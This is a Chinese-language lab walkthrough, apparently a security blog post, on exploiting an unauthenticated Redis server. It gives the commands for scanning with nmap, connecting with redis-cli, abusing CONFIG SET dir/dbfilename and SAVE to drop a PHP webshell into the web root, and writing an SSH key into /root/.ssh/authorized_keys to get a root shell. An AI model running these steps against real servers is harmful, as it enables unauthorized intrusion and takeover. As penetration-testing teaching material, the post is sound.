redis未授权访问漏洞利用

当redis服务(6379)端口对外开放且未作密码认证时,任意用户可未授权访问redis服务并操作获取其数据。
攻击机:10.1.1.100 kali
目标靶机:10.1.1.200
一、探测redis的未授权访问
首先在攻击机上使用nmap对目标机进行扫描,探测开放的服务与端口。
使用全端口扫描,探测存在的服务: nmap -p- -sV 10.1.1.200

redis未授权访问漏洞利用_第1张图片


探测到靶机开放了多个端口,其中存在redis服务的6379端口,开始尝试是否存在redis未授权访问漏洞。
下载redis连接工具,解压后使用make命令进行编译。

redis未授权访问漏洞利用_第2张图片

编译后的redis-cli文件存放在src目录中,将其复制到bin目录下,就可以在任意位置执行。

redis未授权访问漏洞利用_第3张图片

使用redis-cli工具对redis数据尝试进行连接。
redis-cli -h 10.1.1.200 -p 6379

redis未授权访问漏洞利用_第4张图片

连接成功,这个地方存在一个未授权访问。

二、利用未授权访问漏洞写入一句话木马。
对之前使用nmap扫描到的80端口进行访问,发现了一个页面,判断存在web服务,尝试使用扫描工具对目录进行一个探测。

redis未授权访问漏洞利用_第5张图片

使用dirsearch工具进行目录的探测,发现还存在一个phpinfo目录。

redis未授权访问漏洞利用_第6张图片

redis未授权访问漏洞利用_第7张图片

看到了网站的根目录

redis未授权访问漏洞利用_第8张图片

利用之前已经远程连接到的redis数据库,利用写入备份文件的方式,在这个地方可以尝试写入一句话木马。
config set dir <路径> #设置备份路径
config set dbfilename <文件名> #设置备份文件的名字
set #写入数据
save #保存

redis未授权访问漏洞利用_第9张图片

访问目标,拿到webshell

redis未授权访问漏洞利用_第10张图片

三、利用redis未授权访问写入ssh公钥获取shell
先生成ssh的公钥,公钥文件一般保存在/root/.ssh目录下
ssh-keygen -t rsa

redis未授权访问漏洞利用_第11张图片

将公钥写入到foo.txt文件中,前后使用换行,必然和其他符号连接产生其他不可预知错误。
(echo -e “\n\n”; cat ~/.ssh/id_rsa.pub; echo -e “\n\n”) > /tmp/foo.txt

redis未授权访问漏洞利用_第12张图片

将公钥信息写入到目标靶机
cat /tmp/foo.txt | redis-cli -h 10.1.1.200 -p 6379 -x set sshkey

图片

再一次利用备份功能写入公钥的备份文件。
config set dir /root/.ssh
config set dbfilename authorized_keys
save

redis未授权访问漏洞利用_第13张图片

使用ssh连接方式:ssh [email protected] -i /root/.ssh/id_rsa

redis未授权访问漏洞利用_第14张图片


成功获取到shell。

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

免费领取安全学习资料包!redis未授权访问漏洞利用_第15张图片

渗透工具

redis未授权访问漏洞利用_第16张图片

技术文档、书籍

redis未授权访问漏洞利用_第17张图片 redis未授权访问漏洞利用_第18张图片

redis未授权访问漏洞利用_第19张图片

面试题

帮助你在面试中脱颖而出

redis未授权访问漏洞利用_第20张图片

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

redis未授权访问漏洞利用_第21张图片 

redis未授权访问漏洞利用_第22张图片

应急响应笔记

redis未授权访问漏洞利用_第23张图片

学习路线

你可能感兴趣的:(redis,数据库,缓存)